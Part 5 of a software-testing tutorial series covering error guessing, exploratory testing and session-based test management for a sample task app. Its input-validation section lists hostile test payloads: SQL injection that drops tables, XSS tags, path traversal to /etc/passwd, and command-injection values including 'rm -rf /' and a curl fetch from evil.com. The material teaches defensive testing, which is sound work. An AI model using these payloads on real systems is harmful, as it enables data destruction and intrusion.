📚 Series Navigation:
← Previous: Part 4 - Pairwise Testing
📍 You are here: Part 5 - Error Guessing & Exploratory Testing
Next: Part 6 - Test Coverage Metrics →
Introduction: When Structure Meets Creativity
Welcome back! So far in this series, we've learned systematic, structured techniques:
- Part 1: Requirement Analysis (ACID Test)
- Part 2: Equivalence Partitioning & BVA (mathematical boundaries)
- Part 3: Decision Tables & State Transitions (logical completeness)
- Part 4: Pairwise Testing (combinatorial mathematics)
These are your science tools. They're repeatable, measurable, and teachable.
But here's the thing: the best bugs aren't found by following scripts.
They're found by QA engineers who:
- Try the "weird" thing nobody thought to test
- Ask "what if I do THIS?" at 4 PM on Friday
- Have that gut feeling that "something's not right here"
- Channel their inner chaos demon and try to break everything
Today we're covering the art of testing:
- Error Guessing - Predicting where bugs hide based on experience and intuition
- Exploratory Testing - Simultaneous learning, test design, and execution
- Session-Based Test Management - Structured approach to unstructured testing
These techniques find the bugs that automation misses, that requirements don't mention, and that make developers say "How did you even think to try that?!"
Let's embrace the chaos! 🎭
🎯 Error Guessing: The Chaos Demon Within
What is Error Guessing?
Error Guessing is using your experience, intuition, and knowledge of common failure patterns to predict where bugs are likely to hide. It's less "guessing" and more "educated prediction based on years of developers making the same mistakes."
Think of it like this:
- A doctor sees symptoms and thinks "That sounds like flu"
- A mechanic hears a noise and thinks "That's the transmission"
- A QA engineer sees a feature and thinks "I bet they forgot to validate THIS"
The Common Bug Patterns
Here are the classics that keep appearing generation after generation:
1. Input Validation (or Lack Thereof) 💉
The Pattern: Developers trust user input. They shouldn't.
What to try:
SQL Injection Attempts:
→ Email: admin'; DROP TABLE users; --@example.com
→ Password: ' OR '1'='1
→ Search: '; DELETE FROM tasks WHERE '1'='1
XSS (Cross-Site Scripting):
→ Task Title: <script>alert('XSS')</script>
→ Description: <img src=x onerror="alert('XSS')">
→ Username: <iframe src="evil.com"></iframe>
Path Traversal:
→ File download: ../../../etc/passwd
→ Profile image: ../../config/database.yml
→ Export file: ..\..\..\windows\system32\
Command Injection:
→ Filename: test.txt; rm -rf /
→ Email: test@example.com | cat /etc/passwd
→ Search: $(curl evil.com/malware.sh)
TaskMaster 3000 Test Cases:
TC-005-001: SQL Injection in email field during registration
Classification: Security, Negative
Technique: Error Guessing
Test Data:
- Email: "admin'; DROP TABLE users; --@example.com"
- Password: "ValidPass123!"
Expected Result:
✅ Input sanitized/escaped properly
✅ Registration fails with "Invalid email format"
✅ Database remains intact (VERY important!)
✅ No SQL execution logged
✅ Security event logged
❌ No error message reveals database structure
Priority: Critical
Type: Security
TC-005-002: XSS in task description
Classification: Security, Negative
Technique: Error Guessing
Test Data:
- Title: "Innocent Task"
- Description: "<script>alert('You have been pwned!')</script>"
Expected Result:
✅ Script tags escaped or removed
✅ When viewing task, no JavaScript executes
✅ Description displays as plain text or HTML-encoded
✅ Browser console shows no errors
✅ No alert popup appears
Verification:
- View task in list
- Open task details
- Edit task (script shouldn't execute in edit mode either)
Priority: Critical
Type: Security
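Both test cases above come down to the same two server-side defenses: parameterize the query and HTML-encode the output. Here is a minimal, runnable sketch of the idea in Python, with the stdlib `sqlite3` module standing in for TaskMaster's real (unknown) database and `render_description`/`find_user` as hypothetical helper names:

```python
import html
import sqlite3

def render_description(raw: str) -> str:
    # Defense for TC-005-002: HTML-encode user content before display,
    # so <script> reaches the browser as &lt;script&gt; and never executes.
    return html.escape(raw)

def find_user(conn: sqlite3.Connection, email: str):
    # Defense for TC-005-001: a parameterized query treats the payload
    # as plain data, never as SQL to execute.
    return conn.execute("SELECT id FROM users WHERE email = ?", (email,)).fetchall()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
conn.execute("INSERT INTO users (email) VALUES ('admin@example.com')")

payload = "admin'; DROP TABLE users; --@example.com"
assert find_user(conn, payload) == []  # no match, and no injected SQL ran
assert "<script>" not in render_description("<script>alert('XSS')</script>")
# The table survived: the DROP never executed
assert conn.execute("SELECT COUNT(*) FROM users").fetchone()[0] == 1
```

The point for testers: if either assertion-style expectation fails in the real app, the corresponding defense is missing, and the payloads above will do real damage.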
2. Off-by-One Errors 📏
The Pattern: Developers mix up < and <=, or forget that arrays start at 0.
What to try:
TC-005-003: Task title exactly 200 characters (boundary)
Input: "A" * 200
Expected: ✅ Accepted
TC-005-004: Task title exactly 201 characters (just over)
Input: "A" * 201
Expected: ❌ Rejected
TC-005-005: Accessing first item (index 0)
Action: Click first task in list
Expected: ✅ Task opens correctly
TC-005-006: Empty list edge case
Precondition: User has 0 tasks
Action: Try to access "first" task
Expected: ✅ Graceful handling, no crash
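Boundary checks like TC-005-003/004 are cheap to automate. A tiny sketch of the validation under test (`MAX_TITLE` and `title_is_valid` are hypothetical names; the 200-character limit comes from the spec above):

```python
MAX_TITLE = 200  # limit from the TaskMaster spec

def title_is_valid(title: str) -> bool:
    # The classic off-by-one lives in this comparison:
    # it must be <= MAX_TITLE, not < MAX_TITLE.
    return 0 < len(title) <= MAX_TITLE

assert title_is_valid("A" * 200)      # TC-005-003: exactly at the limit
assert not title_is_valid("A" * 201)  # TC-005-004: one over the limit
assert not title_is_valid("")         # the empty edge case
```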
3. Unicode & Special Characters 🌍
The Pattern: Code works great for ASCII, fails spectacularly for anything else.
What to try:
TC-005-007: Emoji overload in task title
Input:
- Title: "🔥💯🚀🎉😀⚡️" * 20 (exceeds 200 char limit with emojis)
- Description: "Testing emoji support 🚀"
Expected:
✅ Emojis stored correctly
✅ Emojis display correctly
✅ Character count works properly (emoji = 1 or more chars?)
✅ No encoding corruption
✅ Search still works
TC-005-008: International characters
Input:
- Title: "Tâche importante avec des accents"
- Description: "测试中文字符 and العربية و עברית"
Expected:
✅ All characters stored correctly
✅ No encoding issues (UTF-8 throughout)
✅ Sorting works correctly
✅ Search handles international text
TC-005-009: Right-to-left text (Arabic, Hebrew)
Input: Task title in Arabic
Expected:
✅ Text displays right-to-left
✅ UI layout doesn't break
✅ Mixed LTR/RTL text handled gracefully
4. Null, Empty, and Whitespace 🎲
The Pattern: null, empty string "", and whitespace " " are all different, but developers often treat them the same.
What to try:
TC-005-010: Null vs empty vs whitespace password
Tests:
- Password = null (impossible via UI, but test API)
- Password = ""
- Password = " " (8 spaces)
- Password = "\n\t\r" (whitespace characters)
Expected: All rejected appropriately
TC-005-011: Whitespace trimming
Input:
- Email: " user@example.com " (spaces before/after)
- Password: "Pass123! "
Expected:
✅ Whitespace trimmed automatically
✅ Registration succeeds
✅ Can login with trimmed email
TC-005-012: Empty optional fields
Input:
- Title: "Valid Title"
- Description: "" (empty)
- Due date: null (not set)
Expected:
✅ Task created successfully
✅ Empty description stored as null or empty
✅ No "undefined" or "null" displayed in UI
5. Race Conditions & Timing ⏱️
The Pattern: Code works fine when one user clicks once, breaks when 10 users click simultaneously.
What to try:
TC-005-013: Rapid-fire task creation
Action:
- Use automation to submit "Create Task" 100 times in 1 second
- OR open 10 browser tabs, click Create simultaneously
Expected:
✅ Rate limiting kicks in, OR
✅ All 100 tasks created with unique IDs
✅ No database deadlocks
✅ No duplicate task IDs
✅ No "undefined" tasks
TC-005-014: Double-click on Submit button
Action:
1. Fill registration form
2. Double-click "Register" button very quickly
Expected:
✅ Button disabled after first click
✅ Only ONE account created
✅ No duplicate database entries
✅ No "account already exists" error
TC-005-015: Concurrent edits
Setup: Open same task in 2 browser tabs
Actions:
- Tab 1: Edit title to "Version A", save
- Tab 2: Edit title to "Version B", save simultaneously
Expected:
✅ Last write wins (or conflict detection)
✅ No data corruption
✅ User notified of conflict
✅ No lost data
6. Error Message Information Leakage 🕵️
The Pattern: Error messages reveal too much about system internals.
What to try:
TC-005-016: Database error exposure
Action: Cause database error (disconnect DB, invalid query)
Expected:
❌ Error message should NOT reveal:
- Database type/version
- Table names
- Column names
- SQL query text
- File paths
✅ Error message should say:
- "Service temporarily unavailable"
- "An error occurred. Please try again."
TC-005-017: Stack trace exposure
Action: Trigger application error
Expected:
❌ No stack traces visible to user
❌ No file paths revealed
❌ No internal variable names
✅ Generic error message
✅ Error logged securely server-side
Building Your Error Guessing Intuition
How to get better at error guessing:
- Study common vulnerability lists
- OWASP Top 10 (web security)
- CWE Top 25 (common weaknesses)
- Read post-mortems and bug reports
- Learn from production incidents
- See patterns across projects
- Think like an attacker
- "If I wanted to break this, how would I?"
- "What did the developer probably forget?"
- Keep a "bug patterns" notebook
- Document bugs you find
- Note the patterns
- Reference in future projects
- Follow security researchers
- Twitter/X, blogs, CVE databases
- See cutting-edge exploits
🔍 Exploratory Testing: Structured Discovery
What is Exploratory Testing?
Exploratory Testing is simultaneous learning, test design, and test execution. You're not following a script; you're investigating the application like a detective.
Formal definition:
"Exploratory testing is an approach to software testing that is concisely described as simultaneous learning, test design, and test execution."
โ James Bach
What this means in practice:
Scripted Testing:
1. Read test case
2. Follow steps exactly
3. Record result
4. Move to next test case
Exploratory Testing:
1. Start with a mission
2. Interact with the app
3. Observe behavior
4. Form hypotheses
5. Design next test based on observations
6. Repeat
When Exploratory Testing Shines ✨
Use exploratory testing when:
✅ New features with limited documentation
- Requirements are still evolving
- No time to write formal test cases
- Need quick feedback
✅ Usability and user experience issues
- "Does this feel right?"
- Workflow confusion
- Visual inconsistencies
✅ Complex integrations
- Multiple systems interacting
- Hard to predict all scenarios
- Need to "feel out" the behavior
✅ Supplementing automated tests
- Automation covers happy paths
- Exploratory finds the weird stuff
✅ Time-constrained situations
- Need to test NOW
- Waiting for test cases isn't an option
Don't use exploratory testing when:
❌ Regulatory compliance testing (need documented proof)
❌ Regression testing (automation is better)
❌ Exact reproducibility required
❌ Multiple testers need same steps
🗂️ Session-Based Test Management (SBTM)
The Challenge with Exploratory Testing
Problem: "I spent 3 hours testing" isn't helpful for:
- Managers (what did you test?)
- Developers (what did you find?)
- Future you (what areas did you cover?)
Solution: Session-Based Test Management adds structure to exploratory testing without killing its creativity.
The SBTM Framework
The SBTM loop: Create Charter → Time-box (60-120 min) → Explore & Document → Write Report → Debrief → More testing? If yes, start the next charter; if no, done.
Step 1: Create a Charter
A charter is your testing mission: what you're investigating and why.
Charter template:
EXPLORATORY TEST CHARTER
Session ID: EXP-001
Charter: [MISSION STATEMENT]
Duration: [60-120 minutes]
Tester: [Name]
Date: [YYYY-MM-DD]
MISSION:
Explore [FEATURE/AREA] looking for [TYPES OF ISSUES]
AREAS TO EXPLORE:
- [Specific area 1]
- [Specific area 2]
- [Specific area 3]
RISKS TO INVESTIGATE:
- [Risk 1]
- [Risk 2]
TEST DATA NEEDED:
- [Data requirement 1]
- [Data requirement 2]
Example Charter: Password Reset Flow
EXPLORATORY TEST CHARTER
Session ID: EXP-TaskMaster-001
Charter: Explore password reset functionality for security vulnerabilities
and edge cases
Duration: 90 minutes
Tester: QA Jane
Date: 2025-11-20
MISSION:
Investigate password reset flow looking for:
- Security vulnerabilities
- Edge cases not covered by scripted tests
- Usability issues
- Race conditions
AREAS TO EXPLORE:
1. Email delivery timing and content
2. Reset link expiration behavior
3. Multiple simultaneous reset requests
4. Password validation during reset
5. Browser back/forward button behavior
6. Mobile vs desktop experience
TESTING HEURISTICS TO APPLY:
- Goldilocks (too big, too small, just right)
- Interruptions (close browser, lose connection)
- Time travel (expired links, manipulated timestamps)
- Boundaries (password length limits)
TEST DATA NEEDED:
- 3 test accounts with different email providers
- Various browsers/devices
- Valid and expired reset tokens
RISKS TO INVESTIGATE:
- Can users reset other people's passwords?
- What if reset link is used multiple times?
- What happens if password reset during active session?
- Can reset tokens be predicted/brute-forced?
Step 2: Execute the Session (Time-boxed)
During the session:
- Start timer (90 minutes)
- Focus exclusively on testing (no Slack, no email)
- Take notes as you go (not after!)
- Document findings immediately
- Take screenshots/videos of anything interesting
- Track time breakdown
Sample Session Notes:
SESSION NOTES - EXP-TaskMaster-001
[00:05] Starting session. Test environment ready.
[00:15] 🐛 BUG FOUND: Password reset link still works after password changed
Steps:
1. Request password reset for user@example.com
2. Receive reset email
3. Change password via Settings (without using reset link)
4. Click reset link from email
5. BUG: Link still works! Can change password again
Severity: HIGH
Impact: Could allow attacker with email access to override new password
Screenshot: bug-001-reset-link-reuse.png
[00:32] 💡 OBSERVATION: Reset email takes 5+ minutes with Outlook.com
- Gmail: ~30 seconds
- Outlook: 5-8 minutes
- Yahoo: 2-3 minutes
Not a bug, but a UX issue. Users might request multiple resets.
Suggestion: Add message "Email may take up to 10 minutes to arrive"
[00:47] ✅ POSITIVE: Mobile layout works well!
- Tested iOS Safari, Android Chrome
- Responsive design good
- Forms easy to fill
- No issues found
[00:55] 🐛 BUG FOUND: No rate limiting on reset requests
Steps:
1. Request password reset
2. Immediately request again (x10)
3. BUG: Received 10 emails, no rate limit
Impact: Could be used for email bombing attack
Severity: MEDIUM
Recommendation: Limit to 3 requests per 15 minutes
[01:10] ❓ QUESTION: Reset link expiration time?
- Docs say "short-lived" but not specific
- Tested: Still works after 2 hours
- Tested: Fails after 24 hours
- Actual expiration: Somewhere between 2-24 hours
Action: Need to clarify with dev team
[01:20] 🔍 EXPLORED: Browser back button after reset
- Reset password successfully
- Click browser back button
- Form shows "Password successfully reset"
- Clicking "Reset Again" shows error (link expired)
- Behavior: Correct! ✅
[01:25] ⏰ SESSION ENDING: Wrapping up notes
TIME BREAKDOWN:
- Test Design & Execution: 60 min (67%)
- Bug Investigation & Documentation: 20 min (22%)
- Session Setup: 10 min (11%)
COVERAGE ASSESSMENT:
✅ Tested: Email delivery, link validity, password validation
✅ Tested: Multiple requests, mobile devices, browser behavior
❌ Not Tested: Email client rendering (need more accounts)
❌ Not Tested: Accessibility (screen readers) - out of time
BUGS FOUND: 2 (1 High, 1 Medium)
OBSERVATIONS: 2
QUESTIONS: 1
Step 3: Session Report
Report Template:
EXPLORATORY TESTING SESSION REPORT
Session: EXP-TaskMaster-001
Feature: Password Reset Flow
Duration: 90 minutes
Date: 2025-11-20
Tester: QA Jane
CHARTER:
Explore password reset for security issues and edge cases
WHAT WAS TESTED:
✅ Email delivery and timing
✅ Reset link validity and expiration
✅ Multiple reset requests
✅ Mobile responsiveness
✅ Browser navigation behavior
WHAT WAS NOT TESTED (and why):
❌ Email client rendering - Need more test accounts
❌ Accessibility - Ran out of time, needs separate session
❌ Internationalization - Only tested English
❌ Slow/unstable networks - Need throttling tools
BUGS FOUND:
1. [HIGH] Reset link works after password changed (BUG-1337)
2. [MEDIUM] No rate limiting on reset requests (BUG-1338)
OBSERVATIONS:
- Outlook.com email delivery very slow (5-8 min)
- Mobile experience is good
- Reset link expiration unclear (between 2-24 hours)
QUESTIONS FOR TEAM:
1. What is the intended reset link expiration time?
2. Should we implement rate limiting? (Recommend: yes)
3. Should reset links be invalidated when password changes? (Recommend: yes)
RISKS DISCOVERED:
⚠️ Email access = password control (even after password change)
⚠️ Potential for email bombing attack
RECOMMENDED NEXT STEPS:
□ Fix HIGH severity bug before release
□ Clarify and document reset link expiration
□ Add rate limiting (3 requests / 15 min)
□ Schedule follow-up session for accessibility testing
TIME BREAKDOWN:
- Execution: 67%
- Documentation: 22%
- Setup: 11%
SESSION RATING: 🌟🌟🌟🌟 (4/5)
Found critical bugs, good coverage, time well spent
Step 4: Debrief
Debrief meeting (15-30 minutes):
Attendees:
- Tester(s) who ran session
- Relevant stakeholders (dev lead, product owner)
Agenda:
- Present findings (5-10 min)
- Discuss bugs and priority (5-10 min)
- Answer questions (5-10 min)
- Plan next steps (5 min)
Sample Debrief:
DEBRIEF NOTES - EXP-TaskMaster-001
Attendees: QA Jane, Dev Lead Mike, PM Sarah
KEY FINDINGS PRESENTED:
✅ Found 2 bugs (1 HIGH, 1 MEDIUM)
✅ Identified usability improvement (email delay message)
✅ Discovered unclear requirement (reset expiration time)
DECISIONS MADE:
1. BUG-1337 (reset link reuse) → Fix immediately, blocks release
2. BUG-1338 (rate limiting) → Fix in this sprint, medium priority
3. Email delay message → Add to backlog for future sprint
4. Reset expiration → Dev team will clarify and document
QUESTIONS ANSWERED:
Q: What's the reset link expiration?
A: Intended to be 24 hours, will add test to verify
Q: Why no automated tests for this?
A: Complex timing issues, good for exploratory first
FOLLOW-UP ACTIONS:
□ Mike: Fix BUG-1337 by Thursday
□ Mike: Implement rate limiting
□ Sarah: Update requirements doc with expiration time
□ Jane: Create bug reports for both issues
□ Jane: Schedule accessibility testing session next week
WHAT WORKED WELL:
✅ Time-boxing kept session focused
✅ Found issues scripts would have missed
✅ Good documentation during session
WHAT COULD IMPROVE:
⚠️ Need better test data setup (more email accounts)
⚠️ 90 min felt slightly long, try 60 min next time
NEXT CHARTER IDEAS:
1. Explore account lockout after failed login attempts
2. Investigate task attachment upload security
3. Test password strength meter accuracy
🎯 Combining Error Guessing with Exploratory Testing
The most powerful approach? Combine them!
Example Session Charter:
EXPLORATORY TEST CHARTER
Charter: Explore task creation for security vulnerabilities and edge cases
Duration: 90 minutes
MISSION:
Use error guessing to test task creation for common security issues,
then explore unexpected behaviors
ERROR GUESSING CHECKLIST:
□ SQL injection in title/description
□ XSS attempts in all text fields
□ Path traversal in file attachments
□ Emoji/Unicode in all fields
□ Null/empty/whitespace inputs
□ Extremely long inputs (>1MB)
□ Race conditions (rapid task creation)
□ Special characters in all fields
EXPLORATORY FOCUS:
After checklist, freely explore:
- Task creation workflow
- Interaction with other features
- Mobile vs desktop differences
- Anything that "feels wrong"
EXPECTED TIME:
- Error guessing checklist: 30-40 min
- Free exploration: 50-60 min
This gives you:
- ✅ Structure from error guessing patterns
- ✅ Coverage of known vulnerabilities
- ✅ Creativity from free exploration
- ✅ Best of both worlds
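One way to make the checklist half of such a session repeatable is a small payload table that feeds a parametrized test before free exploration begins. A sketch (categories and payloads mirror the checklist above; all names are hypothetical):

```python
# Hypothetical payload table mirroring the error-guessing checklist
PAYLOADS = {
    "sql_injection": ["' OR '1'='1", "'; DROP TABLE tasks; --"],
    "xss": ["<script>alert(1)</script>", '<img src=x onerror="alert(1)">'],
    "unicode": ["\U0001F525" * 50, "T\u00e2che importante"],
    "empty_and_whitespace": ["", "        ", "\n\t\r"],
    "very_long": ["A" * 1_000_000],
}

def checklist_inputs():
    # Yield (category, payload) pairs so one loop (or pytest.mark.parametrize)
    # covers every checklist item with every payload.
    for category, values in PAYLOADS.items():
        for value in values:
            yield category, value

cases = list(checklist_inputs())
assert len(cases) == 10  # 2 + 2 + 2 + 3 + 1 payloads across five categories
```

Run every payload through every text field first, note anything surprising, then spend the rest of the time box exploring whatever "felt wrong".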
💡 Practical Tips
For Error Guessing
Do's ✅:
- Maintain a "bug patterns" database from past projects
- Think like an attacker - "How would I break this?"
- Test the unexpected - Users will definitely try it
- Document your attempts - Even if no bugs found
- Share findings - Help team learn common patterns
Don'ts ❌:
- Don't only test happy paths - Errors hide in darkness
- Don't assume "the UI prevents it" - Test the API too
- Don't skip security testing - It's not "someone else's job"
- Don't test randomly - Use patterns and experience
For Exploratory Testing
Do's ✅:
- Use time-boxing - Prevents endless wandering
- Take notes immediately - Memory is unreliable
- Focus on one charter - Don't try to test everything
- Debrief promptly - While session is fresh
- Combine with scripted tests - They complement each other
Don'ts ❌:
- Don't skip the charter - "Just testing randomly" isn't exploratory
- Don't multitask - Close Slack, focus on testing
- Don't document after - Take notes during session
- Don't explore without purpose - Have a mission
- Don't forget to report findings - Exploration without documentation is wasted
📊 Real Results
Case Study: E-commerce Checkout
Context: Major e-commerce platform, payment processing flow
Scripted Testing Results:
- 45 test cases executed
- 3 bugs found
- All "expected" scenarios covered
Exploratory Testing (2 sessions, 180 min total):
- 0 formal test cases
- 11 bugs found, including:
- 1 CRITICAL: Race condition allowing double charges
- 2 HIGH: XSS in order notes field
- 3 MEDIUM: Error message leaking customer data
- 5 LOW: Usability issues
Impact:
- Prevented double-charging customers (would have been massive PR disaster)
- Fixed security issues before security audit
- Improved checkout conversion rate by 2% (UX fixes)
ROI:
- Time invested: 180 minutes
- Issues prevented: Potentially millions in damages + reputation
- Customer trust: Priceless
😈 Conclusion: Embrace Your Inner Chaos Demon
Testing isn't just about following procedures; it's about curiosity, creativity, and controlled chaos.
Key Takeaways
- Error guessing is educated prediction, not random luck. Learn patterns, build intuition, think like an attacker.
- Exploratory testing finds bugs automation misses. The combination of human creativity and systematic exploration is powerful.
- SBTM makes exploratory testing measurable. Charters, time-boxing, and debriefs provide structure without killing creativity.
- Combine techniques. Use error guessing patterns within exploratory sessions. Balance scripted and exploratory testing.
- Document everything. Notes during session, reports after, debriefs with team. Your findings only matter if people know about them.
Your Action Plan
This week:
- ☐ Create your first exploratory testing charter
- ☐ Run a 60-minute session
- ☐ Document with SBTM format
- ☐ Share findings with team
This month:
- ☐ Build your "bug patterns" notebook
- ☐ Schedule regular exploratory sessions (1-2 per week)
- ☐ Review OWASP Top 10
- ☐ Teach error guessing to junior QA
This year:
- ☐ Develop strong security testing skills
- ☐ Master SBTM framework
- ☐ Become the "bug whisperer" on your team
What's Next?
In Part 6, we return to structure and metrics. We'll explore Test Coverage in depth: how to measure it, what actually matters, and how to prove your testing is effective without drowning in meaningless numbers.
We'll cover:
- Requirement vs Code coverage
- The test pyramid (with real numbers)
- Metrics that actually help
- Dashboards that tell a story
Coming Next Week:
Part 6: Test Coverage Metrics - What Actually Matters 📊
📊 Series Progress
✅ Part 1: Requirement Analysis
✅ Part 2: Equivalence Partitioning & BVA
✅ Part 3: Decision Tables & State Transitions
✅ Part 4: Pairwise Testing
✅ Part 5: Error Guessing & Exploratory Testing ← You just finished this!
⬜ Part 6: Test Coverage Metrics
⬜ Part 7: Real-World Case Study
⬜ Part 8: Modern QA Workflow
⬜ Part 9: Bug Reports That Get Fixed
⬜ Part 10: The QA Survival Kit
🧮 Quick Reference Card
Error Guessing Checklist
SECURITY:
□ SQL injection in all text inputs
□ XSS in all user content
□ Path traversal in file operations
□ Command injection in system calls
□ Authentication bypass attempts
□ Authorization escalation
INPUT VALIDATION:
□ Null values
□ Empty strings
□ Whitespace only
□ Extremely long inputs
□ Special characters
□ Unicode & emojis
□ Negative numbers (where positive expected)
TIMING & CONCURRENCY:
□ Rapid button clicks (double-click)
□ Simultaneous operations
□ Very slow connections
□ Timeouts and interruptions
□ Race conditions
ERROR HANDLING:
□ Information leakage in errors
□ Stack trace exposure
□ Database error messages
□ File path disclosure
SBTM Session Checklist
BEFORE SESSION:
□ Create charter with clear mission
□ Set time box (60-120 min)
□ Prepare test data
□ Clear calendar (no interruptions)
□ Setup note-taking tools
DURING SESSION:
□ Start timer
□ Take notes continuously
□ Screenshot interesting findings
□ Track time breakdown
□ Stay focused on charter
AFTER SESSION:
□ Write session report
□ Create bug reports
□ Calculate time breakdown
□ Schedule debrief
□ Plan next session
DEBRIEF:
□ Present findings
□ Discuss priority
□ Answer questions
□ Plan follow-up actions
□ Document decisions
Remember: The best bugs are found by those brave enough to try the weird stuff! 🔥
What's your favorite bug you've found through exploratory testing? Share in the comments!